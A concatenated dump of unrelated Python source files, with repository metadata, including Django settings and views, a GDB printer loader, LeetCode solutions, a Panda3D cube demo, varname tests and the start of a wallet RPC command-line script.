    simply repeats; confirm in .utils.
    """
    while True:
        r = range(len(options))
        for i in r:
            print(i, options[i])
        selection = lazyInt(input(question))
        if selection in r:
            return options[selection]
| [
"14838767+antipatico@users.noreply.github.com"
] | 14838767+antipatico@users.noreply.github.com |
f4823491f0f44b3d340a720dbc47cf29a5a8e325 | 55540f3e86f1d5d86ef6b5d295a63518e274efe3 | /toolchain/riscv/MSYS/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d/libstdc++.a-gdb.py | 8e9d75e886ed14abcb55b187bbbe376b0ca67b81 | [
"Apache-2.0"
] | permissive | bouffalolab/bl_iot_sdk | bc5eaf036b70f8c65dd389439062b169f8d09daa | b90664de0bd4c1897a9f1f5d9e360a9631d38b34 | refs/heads/master | 2023-08-31T03:38:03.369853 | 2023-08-16T08:50:33 | 2023-08-18T09:13:27 | 307,347,250 | 244 | 101 | Apache-2.0 | 2023-08-28T06:29:02 | 2020-10-26T11:16:30 | C | UTF-8 | Python | false | false | 2,772 | py | # -*- python -*-
# Copyright (C) 2009-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
pythondir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/share/gcc-10.2.0/python'
libdir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d'
# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
# Update module path. We want to find the relative path from libdir
# to pythondir, and then we want to apply that relative path to the
# directory holding the objfile with which this file is associated.
# This preserves relocatability of the gcc tree.
# Do a simple normalization that removes duplicate separators.
pythondir = os.path.normpath (pythondir)
libdir = os.path.normpath (libdir)
prefix = os.path.commonprefix ([libdir, pythondir])
# In some bizarre configuration we might have found a match in the
# middle of a directory name.
if prefix[-1] != '/':
prefix = os.path.dirname (prefix) + '/'
# Strip off the prefix.
pythondir = pythondir[len (prefix):]
libdir = libdir[len (prefix):]
# Compute the ".."s needed to get from libdir to the prefix.
dotdots = ('..' + os.sep) * len (libdir.split (os.sep))
objfile = gdb.current_objfile ().filename
dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)
if not dir_ in sys.path:
sys.path.insert(0, dir_)
# Call a function as a plain import would not execute body of the included file
# on repeated reloads of this object file.
from libstdcxx.v6 import register_libstdcxx_printers
register_libstdcxx_printers(gdb.current_objfile())
| [
"jczhang@bouffalolab.com"
] | jczhang@bouffalolab.com |
177530b9da773539773055017d047774f865fb61 | 9bd373e7e273e5df973996732de63aa1c7fa316e | /leetcode/算法/2排序/347.py | 839ab2c38e7ab42f3a087f61f90637a6b8d3f1d6 | [] | no_license | chenchen1104/leetcode | 677609092143f3be628925ba3c9ee208e2e83e0a | 380a62257f09ffba36c1945de50d2c662f4caf12 | refs/heads/main | 2023-07-06T20:58:43.744852 | 2021-08-17T08:19:39 | 2021-08-17T08:19:39 | 397,168,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py | import collections
import heapq
# LeetCode 347: top-k most frequent elements via a size-k min-heap.
nums = [4, 3, 1, 6, 8, 2, 4, 9, 2]
k = 3
# Count how many times each number occurs.
counter = collections.Counter(nums)
h = []  # min-heap of (count, number); never holds more than k entries
for key, val in counter.items():
    heapq.heappush(h, (val, key))
    if len(h) > k:
        # Drop the least frequent of the k+1 candidates.
        heapq.heappop(h)
print([x[1] for x in h])
| [
"noreply@github.com"
] | chenchen1104.noreply@github.com |
48917476b4e7a9e384dae9c11d27a8e7ba79d4ac | c33d8932d79ae2de58c72b49a7475fff04d3b8ed | /ccachurch/settings.py | 13c1c780fafd8b578cd466f9f61495d7b24fe26d | [] | no_license | ombwayomichael/ccachurch | 2448893e41daf63033a1251ad2b8be1591e18efb | 531e7aee7aade4c4fb525bbb5d1e93174cfcf064 | refs/heads/master | 2020-05-16T13:42:24.000046 | 2015-06-18T17:21:27 | 2015-06-18T17:21:27 | 37,673,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,855 | py | """
Django settings for ccachurch project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control -- rotate it and load
# from the environment before any production deployment.
SECRET_KEY = '385@_nie32x9*yde%gbusl4r4q0*cx06f&@r54q9^c1yh4n%r6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
SITE_ID=1
# TEMPLATE_DEBUG / TEMPLATE_DIRS / MIDDLEWARE_CLASSES are Django 1.7-era
# setting names (matching the docstring above).
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'church',
    'registration',
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'ccachurch.urls'
WSGI_APPLICATION = 'ccachurch.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
TEMPLATE_CONTEXT_PROCESSORS=(
    'django.core.context_processors.media',
    'django.contrib.auth.context_processors.auth',
)
STATIC_URL = '/static/'
TEMPLATE_DIRS=[os.path.join(BASE_DIR,'templates')]
STATICFILES_DIRS=[os.path.join(BASE_DIR,'static')]
MEDIA_URL='/media/'
MEDIA_ROOT=os.path.join(BASE_DIR,'media')
PHOTOLOGUE_DIR='photologue'
#PHOTOLOGUE_PATH=[os.path.join(BASE_DIR, 'photologue')]
# django-registration settings
REGISTRATION_OPEN = True  # If True, users can register
ACCOUNT_ACTIVATION_DAYS = 7  # One-week activation window; you may, of course, use a different value.
REGISTRATION_AUTO_LOGIN = True  # If True, the user will be automatically logged in.
LOGIN_REDIRECT_URL = '/church/'  # The page you want users to arrive at after they successful log in
LOGIN_URL = '/accounts/login/'
"michael.ombwayo@gmail.com"
] | michael.ombwayo@gmail.com |
40a108bdf9f73c90fcb8826f13c0a48876881f6f | cc5931ce51063e1ed34e3b6ae8965ffd88c8691d | /accounts/views.py | 16b0deb3804311ed17364f0273dddc0aaef682f1 | [] | no_license | Chetan45s/Django-Custom-User-Boilerplate | c94368bbf76bc0600152aeda9eb7659c41899e80 | ad332f35826d47075f9d20e332975d2dbbf3713d | refs/heads/main | 2023-07-13T22:55:48.219369 | 2021-08-16T10:24:15 | 2021-08-16T10:24:15 | 385,047,445 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,582 | py | from django.shortcuts import render,redirect
from django.contrib.auth import authenticate, login, get_user_model
from .forms import *
from django.utils.http import is_safe_url
def index(request):
    """Render the public landing page."""
    return render(request,"index.html")
User = get_user_model()
def signup(request):
    """Register a new user account; redirect home on success."""
    form = RegisterForm(request.POST or None)
    context = {
        "form": form
    }
    if form.is_valid():
        # Debug prints and commented-out username handling removed.
        email = form.cleaned_data.get("email")
        password = form.cleaned_data.get("password")
        # NOTE(review): create_user is called positionally; this assumes the
        # custom manager's signature is create_user(email, password) -- confirm.
        User.objects.create_user(email, password)
        return redirect("/")
    return render(request, "signup.html", context)
def login_page(request):
    """Authenticate a user and redirect safely.

    Honours a ``next`` parameter from the query string or the POST body,
    but only follows it when ``is_safe_url`` accepts it for this host
    (open-redirect guard); otherwise falls back to the site root.
    """
    form = LoginForm(request.POST or None)
    context = {
        "form": form
    }
    next_ = request.GET.get('next')
    next_post = request.POST.get('next')
    redirect_path = next_ or next_post or None
    if form.is_valid():
        email = form.cleaned_data.get("email")
        password = form.cleaned_data.get("password")
        user = authenticate(request, email=email, password=password)
        if user is not None:
            login(request, user)
            # is_safe_url rejects None and off-host URLs.
            if is_safe_url(redirect_path, request.get_host()):
                return redirect(redirect_path)
            else:
                return redirect("/")
        else:
            # Surface the failure on the form instead of printing "Error"
            # to stdout, so the template can show it to the user.
            form.add_error(None, "Invalid email or password.")
    return render(request, "login.html", context)
| [
"chetansalmotra45@gmail.com"
] | chetansalmotra45@gmail.com |
2e15c79c175d70946cde876076ace6ad5335cfbc | 7c014147f014536815830c16eedcda86695f35db | /Chap03/ex02_내장함수.py | 12b9d1bacece2ef63b242e15b66f595c396766e6 | [] | no_license | goodluck3586/python2020 | 436a6143a1b7031313fbe97da6cb245d3c7719ec | 7cf5ab0ff443f327aec9e99a7a137c812b67fafa | refs/heads/master | 2023-03-05T05:59:52.416481 | 2021-02-18T22:55:00 | 2021-02-18T22:55:00 | 295,363,541 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,014 | py | # 파이썬 내장 함수는 외부 모듈과 달리 import가 필요없다.
# Demonstrates Python built-in functions; unlike external modules, no import is needed.
# type(object) => returns the object's type.
print(type("abcd")) # <class 'str'>
print(type([])) # <class 'list'>
# id(object) => returns the object's identity (its address in CPython).
a = 3
print(id(a)) # 1893312464 (example value; differs per run)
print(type(a)) # <class 'int'>
# pow(x, y) => returns x raised to the power y.
print(pow(3, 4), pow(2, 3)) # 81 8
# sum(iterable) => returns the total.
print(sum((1,2,3,4,5)), sum([1,2,3])) # 15 6
# max(iterable), min(iterable)
print(max([1,2,3]), max('python')) # 3, y
print(min([1,2,3]), min('python')) # 1, h
# round(number) => returns the rounded number.
print(round(4.6)) # 5
print(round(4.1)) # 4
print(round(3.141592, 3)) # 3.142
# eval(evaluable string) => returns the result of evaluating the string.
print(eval('1+2')) # 3
# list(iterable) => returns a list.
print(list('python')) # ['p', 'y', 't', 'h', 'o', 'n']
print(list((1,2,3))) # [1, 2, 3]
# enumerate() => takes an iterable and yields (index, item) pairs.
for i, char in enumerate('python'):
    print(i, char)
# filter(function f, iterable) => keeps only the items for which f returns true.
def positive(n):
    return n>0
print(list(filter(positive, [-1, 3, 2, 0, -7, 9]))) # [3, 2, 9]
print(list(filter(lambda n: n>0, [-1, 3, 2, 0, -7, 9]))) # [3, 2, 9]
# map(function f, iterable) => returns the results of applying f to each item.
def two_times(x):
    return x*2
print(list(map(two_times, [1,2,3,4]))) # [2, 4, 6, 8]
print(list(map(lambda x: x*2, [1,2,3,4]))) # [2, 4, 6, 8]
# range([start], stop, [step]) => returns an iterable object over the given numbers.
print(list(range(5))) # [0, 1, 2, 3, 4]
print(list(range(1, 5))) # [1, 2, 3, 4]
print(list(range(1, 10, 2))) # [1, 3, 5, 7, 9]
# sorted(iterable)
print(sorted([3, 1, 2])) # [1, 2, 3]
print(sorted('zero')) # ['e', 'o', 'r', 'z']
| [
"goodluck3586@gsm.hs.kr"
] | goodluck3586@gsm.hs.kr |
58d02aeb5201dc55547767b3a597b200ad59a0d3 | a529505a9a3382cc6a8274e15a01d8a523fffb64 | /procedural_cube.py | 6bc5adf2c9d55f514aaf3a6319b8aaf65818cb8b | [] | no_license | BhavyanshM/Simulations | 5c5fc451edccfd452613a9da850b45f1b01eb276 | 7565446b6023870a6d85f7a5f4bad0f732a4e43e | refs/heads/master | 2020-09-11T10:11:01.932586 | 2020-02-07T06:30:23 | 2020-02-07T06:30:23 | 222,031,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,999 | py | from direct.showbase.ShowBase import ShowBase
from direct.showbase.DirectObject import DirectObject
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from panda3d.core import *
import sys
import os
base = ShowBase()  # creates the window, the scene graph and the task manager
# base.disableMouse()
base.camera.setPos(10, -100, 0)  # move the default camera so the geometry is in view
# You can't normalize inline so this is a helper function
def normalized(*args):
    """Build an LVector3 from *args* and return it scaled to unit length."""
    vec = LVector3(*args)
    vec.normalize()
    return vec
# helper function to make a square given the Lower-Left-Hand and
# Upper-Right-Hand corners
def makeSquare(x1, y1, z1, x2, y2, z2):
    """Build one square face as a Geom given two opposite corners.

    The corners (x1, y1, z1) and (x2, y2, z2) span the quad; the quad is
    emitted as two triangles because Geom has no native quad primitive.
    NOTE: ``format`` shadows the built-in of the same name (left unchanged here).
    """
    format = GeomVertexFormat.getV3n3cpt2()
    vdata = GeomVertexData('square', format, Geom.UHDynamic)
    vertex = GeomVertexWriter(vdata, 'vertex')
    normal = GeomVertexWriter(vdata, 'normal')
    color = GeomVertexWriter(vdata, 'color')
    texcoord = GeomVertexWriter(vdata, 'texcoord')
    # make sure we draw the square in the right plane
    # (x1 == x2 means the quad lies in a plane of constant x)
    if x1 != x2:
        vertex.addData3(x1, y1, z1)
        vertex.addData3(x2, y1, z1)
        vertex.addData3(x2, y2, z2)
        vertex.addData3(x1, y2, z2)
        normal.addData3(normalized(2 * x1 - 1, 2 * y1 - 1, 2 * z1 - 1))
        normal.addData3(normalized(2 * x2 - 1, 2 * y1 - 1, 2 * z1 - 1))
        normal.addData3(normalized(2 * x2 - 1, 2 * y2 - 1, 2 * z2 - 1))
        normal.addData3(normalized(2 * x1 - 1, 2 * y2 - 1, 2 * z2 - 1))
    else:
        vertex.addData3(x1, y1, z1)
        vertex.addData3(x2, y2, z1)
        vertex.addData3(x2, y2, z2)
        vertex.addData3(x1, y1, z2)
        normal.addData3(normalized(2 * x1 - 1, 2 * y1 - 1, 2 * z1 - 1))
        normal.addData3(normalized(2 * x2 - 1, 2 * y2 - 1, 2 * z1 - 1))
        normal.addData3(normalized(2 * x2 - 1, 2 * y2 - 1, 2 * z2 - 1))
        normal.addData3(normalized(2 * x1 - 1, 2 * y1 - 1, 2 * z2 - 1))
    # adding different colors to the vertex for visibility
    # (currently all four vertices are red)
    color.addData4f(1.0, 0.0, 0.0, 1.0)
    color.addData4f(1.0, 0.0, 0.0, 1.0)
    color.addData4f(1.0, 0.0, 0.0, 1.0)
    color.addData4f(1.0, 0.0, 0.0, 1.0)
    # color.addData4f(0.0, 1.0, 0.0, 1.0)
    # color.addData4f(0.0, 0.0, 1.0, 1.0)
    # color.addData4f(1.0, 0.0, 1.0, 1.0)
    # texcoord.addData2f(0.0, 1.0)
    # texcoord.addData2f(0.0, 0.0)
    # texcoord.addData2f(1.0, 0.0)
    # texcoord.addData2f(1.0, 1.0)
    # Quads aren't directly supported by the Geom interface
    # you might be interested in the CardMaker class if you are
    # interested in rectangle though
    tris = GeomTriangles(Geom.UHDynamic)
    tris.addVertices(0, 1, 3)
    tris.addVertices(1, 2, 3)
    square = Geom(vdata)
    square.addPrimitive(tris)
    return square
# Note: it isn't particularly efficient to make every face as a separate Geom.
# instead, it would be better to create one Geom holding all of the faces.
# One quad per call; the arguments are two opposite corners of each face.
square0 = makeSquare(-1, 0, -1, 1, 0, 1)
square1 = makeSquare(-1, 1, -1, 1, 1, 1)
square2 = makeSquare(-1, 1, 1, 1, -1, 1)
square3 = makeSquare(-1, 1, -1, 1, -1, -1)
square4 = makeSquare(-1, -1, -1, -1, 1, 1)
square5 = makeSquare(1, -1, -1, 1, 1, 1)
snode = GeomNode('square')
# Only the first face is attached; the other five are built but unused.
snode.addGeom(square0)
# snode.addGeom(square1)
# snode.addGeom(square2)
# snode.addGeom(square3)
# snode.addGeom(square4)
# snode.addGeom(square5)
cube = render.attachNewNode(snode)
cube.hprInterval(1.5, (0, 360, 0)).loop()  # full 360-degree P rotation every 1.5 s, looping
# OpenGl by default only draws "front faces" (polygons whose vertices are
# specified CCW).
cube.setTwoSided(True)
class MyTapper(DirectObject):
    """Holds interactive toggles for the demo scene.

    Only __init__ is live: it creates a spotlight and enlarges the window.
    The texture/light toggle handlers and their key bindings are all
    commented out below.
    """
    def __init__(self):
        # self.testTexture = loader.loadTexture("maps/envir-reeds.png")
        # self.accept("1", self.toggleTex)
        # self.accept("2", self.toggleLightsSide)
        # self.accept("3", self.toggleLightsUp)
        self.LightsOn = False
        self.LightsOn1 = False
        slight = Spotlight('slight')
        slight.setColor((1, 1, 1, 1))
        lens = PerspectiveLens()
        slight.setLens(lens)
        # Both NodePaths attach the very same Spotlight object.
        self.slnp = render.attachNewNode(slight)
        self.slnp1 = render.attachNewNode(slight)
        # Resize the window to 2048 x 1536.
        w, h = 1024*2, 768*2
        props = WindowProperties()
        props.setSize(w, h)
        base.win.requestProperties(props)
    # def toggleTex(self):
    #     global cube
    #     if cube.hasTexture():
    #         cube.setTextureOff(1)
    #     else:
    #         cube.setTexture(self.testTexture)
    # def toggleLightsSide(self):
    #     global cube
    #     self.LightsOn = not self.LightsOn
    #     if self.LightsOn:
    #         render.setLight(self.slnp)
    #         self.slnp.setPos(cube, 10, -400, 0)
    #         self.slnp.lookAt(10, 0, 0)
    #     else:
    #         render.setLightOff(self.slnp)
    # def toggleLightsUp(self):
    #     global cube
    #     self.LightsOn1 = not self.LightsOn1
    #     if self.LightsOn1:
    #         render.setLight(self.slnp1)
    #         self.slnp1.setPos(cube, 10, 0, 400)
    #         self.slnp1.lookAt(10, 0, 0)
    #     else:
    #         render.setLightOff(self.slnp1)
t = MyTapper()  # builds the spotlight and resizes the window (key bindings are commented out)
base.run()  # enter Panda3D's main loop (blocks until the window closes)
| [
"bhavyanshmishra@gmail.com"
] | bhavyanshmishra@gmail.com |
00b9b9559abc32c5f0c25f3ff1f65614b6b777f9 | dcf6b3c43965459e9648fc34209f7e0c681c4d41 | /07-Strings-Methods/the-find-and-index-methods.py | 91271dd4d28dce4e402ca2b6d7bc623771f0060c | [] | no_license | saulhappy/pythonLearning | 8e28cbebb16208cd04640baf641fc72039a4e756 | 4b80a6287279509581daa8617153144af3bf95d3 | refs/heads/master | 2022-12-11T08:36:20.863901 | 2020-09-02T20:12:51 | 2020-09-02T20:12:51 | 288,853,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | print("saul is learning python".find("y"))
print("saul is learning python".find("python"))  # 17
print("saul is learning python".find("s"))  # 0 (only the first match is reported)
print("saul is learning python".find("saul"))  # 0
print("saul is learning python".find("z"))  # -1: find() returns -1 when the substring is absent
print("saul is learning python".find("s"))  # 0
print("saul is learning python".find("l"))  # 3
# start looking at index 5 of object
print("saul is learning python".find("l", 5))  # 8 (the "l" in "learning")
# index works the same as find, but raises ValueError instead of returning -1 if it doesn't find anything.
| [
"646634@gmail.com"
] | 646634@gmail.com |
0d1bfe45270d76b88c774d848ede4a38ee8cb120 | 60364a7089bc359494a4a42ba6d79c2fd0b84185 | /django_extended/emailing/backend.py | ced758319243991dd06e01a4e9d2d45cbf3c16e2 | [
"BSD-3-Clause"
] | permissive | dalou/django-extended | 4936c77535bc4421a9f003da58a49629bc7996df | a7ba952ea7089cfb319b4615ae098579c9ab14f9 | refs/heads/master | 2021-10-27T09:33:28.615992 | 2015-12-14T14:55:33 | 2015-12-14T14:55:33 | 46,408,921 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,698 | py | from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.message import sanitize_address, DEFAULT_ATTACHMENT_MIME_TYPE
from django.core.mail.backends.smtp import EmailBackend
from .models import *
class DevBackend(EmailBackend):
    """SMTP backend for development environments.

    Every recipient list (to/cc/bcc) is overwritten with hard-coded
    developer addresses, and the real ``to`` recipients are appended to
    the subject so the rerouted mail can still be traced.
    """
    def route_recipients(self, recipients):
        """Overwrite each entry of ``recipients`` in place with the dev addresses."""
        for i, r in enumerate(recipients):
            recipients[i] = "autrusseau.damien@gmail.com, adelineautrusseau@gmail.com"
        return recipients
    def _send(self, message):
        # Capture the real recipients before they are rewritten.
        original_receiver = ", ".join(message.to)
        message.to = self.route_recipients(message.to)
        message.cc = self.route_recipients(message.cc)
        message.bcc = self.route_recipients(message.bcc)
        # Typo fixed in the user-visible tag: "orginal" -> "original".
        message.subject += ' <original receivers : %s>' % original_receiver
        super(DevBackend, self)._send(message)
class ProductionBackend(EmailBackend):
    """SMTP backend for production.

    Currently a plain pass-through to the stock SMTP EmailBackend: the
    domain/test-list recipient filtering below is entirely commented out.
    """
    def route_recipients(self, recipients):
        # Disabled filtering sketch (kept for reference):
        # if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
        #     receivers = ", ".join(list(set(TestEmail.objects.all().values_list('email', flat=True))))
        #     # for i,r in enumerate(recipients):
        #     #     if not r.endswith('@%s' % PROJECT_DOMAIN):
        #     #         recipients = settings.DEFAULT_FROM_EMAIL
        return recipients
    def _send(self, message):
        # Recipient rewriting is disabled; the message is sent unchanged.
        # if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
        #     message.to = self.route_recipients(message.to)
        #     message.cc = self.route_recipients(message.cc)
        #     message.bcc = self.route_recipients(message.bcc)
        super(ProductionBackend, self)._send(message)
"autrusseau.damien@gmail.com"
] | autrusseau.damien@gmail.com |
5ca0ec8dad238e96c49b6f3d9be34be18354dfcc | 461f1f8d92fc7397794b662526d2e6e1bab41fff | /tests/test_will.py | 86b92894329ea5f0b0b0f209e0da4dced1b0017d | [] | no_license | breuleux/python-varname | b467dfbfafd71410e2370408cc724455668f370c | 867e4aeec892915c496a31a19cfd933a6d67fc8a | refs/heads/master | 2023-07-06T15:59:05.221636 | 2021-07-07T07:04:08 | 2021-07-07T07:04:08 | 392,854,301 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,360 | py | import sys
import pytest
from varname import *
def test_will():
    """will() inside i_will() should capture 'abc' — the attribute accessed
    on i_will()'s return value at the call site."""
    def i_will():
        iwill = will()
        func = lambda: 0
        func.will = iwill
        # return the function itself
        # so that we can retrieve it after the attribute call
        func.abc = func
        return func
    func = i_will().abc
    assert func.will == 'abc'
    assert getattr(func, 'will') == 'abc'
def test_will_deep():
    """Same as test_will, but will(2) is called one frame deeper, so the
    frame argument must skip get_will's own frame."""
    def get_will():
        return will(2)
    def i_will():
        iwill = get_will()
        func = lambda: 0
        func.will = iwill
        # return the function itself
        # so that we can retrieve it after the attribute call
        func.abc = func
        return func
    func = i_will().abc
    assert func.will == 'abc'
# issue #17: will() must also work when called from inside a property getter.
def test_will_property():
    """Bare `c.iwill` yields no follow-up attribute (will is None); chained
    `c.iwill.do()` must record 'do'."""
    class C:
        def __init__(self):
            self.will = None
        @property
        def iwill(self):
            self.will = will(raise_exc=False)
            return self
        def do(self):
            return 'I will do something'
    c = C()
    c.iwill
    assert c.will is None
    result = c.iwill.do()
    assert c.will == 'do'
    assert result == 'I will do something'
def test_will_method():
    """Exercise will() through many call shapes: direct method call, __call__,
    an aliased method, __getattr__ and __getitem__ — the recorded will must
    always be the attribute that follows permit() in the chain."""
    class AwesomeClass:
        def __init__(self):
            self.wills = [None]
        def __call__(self, *_):
            return self
        myself = __call__
        __getattr__ = __call__
        def permit(self, *_):
            self.wills.append(will(raise_exc=False))
            if self.wills[-1] is None:
                raise AttributeError(
                    'Should do something with AwesomeClass object'
                )
            # let self handle do
            return self
        def do(self):
            if self.wills[-1] != 'do':
                raise AttributeError("You don't have permission to do")
            return 'I am doing!'
        __getitem__ = permit
    awesome = AwesomeClass()
    # do() without a prior permit() must be rejected.
    with pytest.raises(AttributeError) as exc:
        awesome.do()
    assert str(exc.value) == "You don't have permission to do"
    # permit() with nothing chained after it records None and raises.
    with pytest.raises(AttributeError) as exc:
        awesome.permit()
    assert str(exc.value) == 'Should do something with AwesomeClass object'
    # clear wills
    awesome = AwesomeClass()
    ret = awesome.permit().do()
    assert ret == 'I am doing!'
    assert awesome.wills == [None, 'do']
    awesome = AwesomeClass()
    ret = awesome.myself().permit().do()
    assert ret == 'I am doing!'
    assert awesome.wills == [None, 'do']
    awesome = AwesomeClass()
    ret = awesome().permit().do()
    assert ret == 'I am doing!'
    assert awesome.wills == [None, 'do']
    awesome = AwesomeClass()
    ret = awesome.attr.permit().do()
    assert ret == 'I am doing!'
    assert awesome.wills == [None, 'do']
    awesome = AwesomeClass()
    ret = awesome.permit().permit().do()
    assert ret == 'I am doing!'
    assert awesome.wills == [None, 'permit', 'do']
    # __getitem__ is aliased to permit, so subscription behaves the same way.
    with pytest.raises(AttributeError) as exc:
        print(awesome[2])
    assert str(exc.value) == 'Should do something with AwesomeClass object'
    ret = awesome[2].do()
    assert ret == 'I am doing!'
def test_will_decorated():
    """will() must see through a decorator that returns self: the decorated
    method needs frame depth 2 to skip the wrapper frame."""
    def return_self(func):
        def wrapper(self, *args, **kwargs):
            func(self, *args, **kwargs)
            return self
        return wrapper
    class Foo:
        def __init__(self):
            self.will = None
        def get_will(self):
            self.will = will(raise_exc=False)
            return self
        @return_self
        def get_will_decor(self):
            self.will = will(2, raise_exc=False)
        def __getattr__(self, name):
            return self.will
    x = Foo().get_will().x
    assert x == 'x'
    x = Foo().get_will_decor().x
    assert x == 'x'
def test_will_fail():
    """When retrieval fails: raise_exc=True raises VarnameRetrievingError,
    raise_exc=False returns None."""
    def get_will(raise_exc):
        return will(raise_exc=raise_exc)
    with pytest.raises(VarnameRetrievingError):
        get_will(True)
    the_will = get_will(False)
    assert the_will is None
def test_frame_fail_will(no_getframe):
    """With frame retrieval disabled (no_getframe fixture), will() must raise
    when raise_exc=True and otherwise degrade to None."""
    def func(raise_exc):
        wil = will(raise_exc=raise_exc)
        ret = lambda: None
        ret.a = 1
        ret.will = wil
        return ret
    with pytest.raises(VarnameRetrievingError):
        func(True).a
    assert func(False).a == 1
    assert func(False).will is None
| [
"noreply@github.com"
] | breuleux.noreply@github.com |
9a7e6df18863e3a71f4ab3c48f3ae26bfe8d0508 | 0e8c3ce37766565d4a114c2e3b92aea9109caf02 | /Python/leetcode/Shift 2D array.py | 63ea2fce770f0e400455a53738913190b291875e | [] | no_license | NarglesCS/Library | c2f2694d5e2e0470010402f1cc361f4cc16587c2 | 2dc341e78a4ba28a45ec528591a5eb3f7581de75 | refs/heads/master | 2023-05-29T02:15:54.730443 | 2023-05-07T18:34:20 | 2023-05-07T18:34:20 | 262,146,390 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | class Solution:
def shiftGrid(self, grid: List[List[int]], k: int) -> List[List[int]]:
temp = [None,None]
for x in range(k):
for i in range(len(grid)):
if (i-1) == temp[0]:
grid[i].insert(0,temp[1])
if i != len(grid)-1:
#continue
temp = [i,grid[i].pop()]
if i == 0:
grid[i].insert(0,grid[len(grid)-1].pop())
return grid
| [
"noreply@github.com"
] | NarglesCS.noreply@github.com |
b3d2d3ace4ff60ad02e28788f44aac9e11d0864a | 564ca53b32db79e3a8638fd695ae9879dd312672 | /contrib/bitrpc/bitrpc.py | 5dc713f0d50363bb901b0fcb85efaefe7f6cdbd3 | [
"MIT"
] | permissive | ChilCoin/Chilcoin | 0a631efdbc8bf7576aaf3affba2b155623ea4460 | b76f5485b7875b5a490590ca2dac02141c450537 | refs/heads/master | 2020-04-06T06:59:31.066458 | 2014-09-10T01:47:01 | 2014-09-10T01:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,838 | py | from jsonrpc import ServiceProxy
import sys
import string
# Interactive Python 2 CLI wrapper around the wallet's JSON-RPC interface:
# dispatches on sys.argv[1], prompts for each command's arguments with
# raw_input, and prints the RPC result.  Every branch uses a bare except
# and prints a generic error, so the underlying exception is swallowed.
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
    access = ServiceProxy("http://127.0.0.1:9442")
else:
    access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:9442")
# Dispatch on the first command-line argument (case-insensitive).
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
    try:
        path = raw_input("Enter destination path/filename: ")
        print access.backupwallet(path)
    except:
        print "\n---An error occurred---\n"
elif cmd == "getaccount":
    try:
        addr = raw_input("Enter a Chilcoin address: ")
        print access.getaccount(addr)
    except:
        print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
    try:
        acct = raw_input("Enter an account name: ")
        print access.getaccountaddress(acct)
    except:
        print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
    try:
        acct = raw_input("Enter an account name: ")
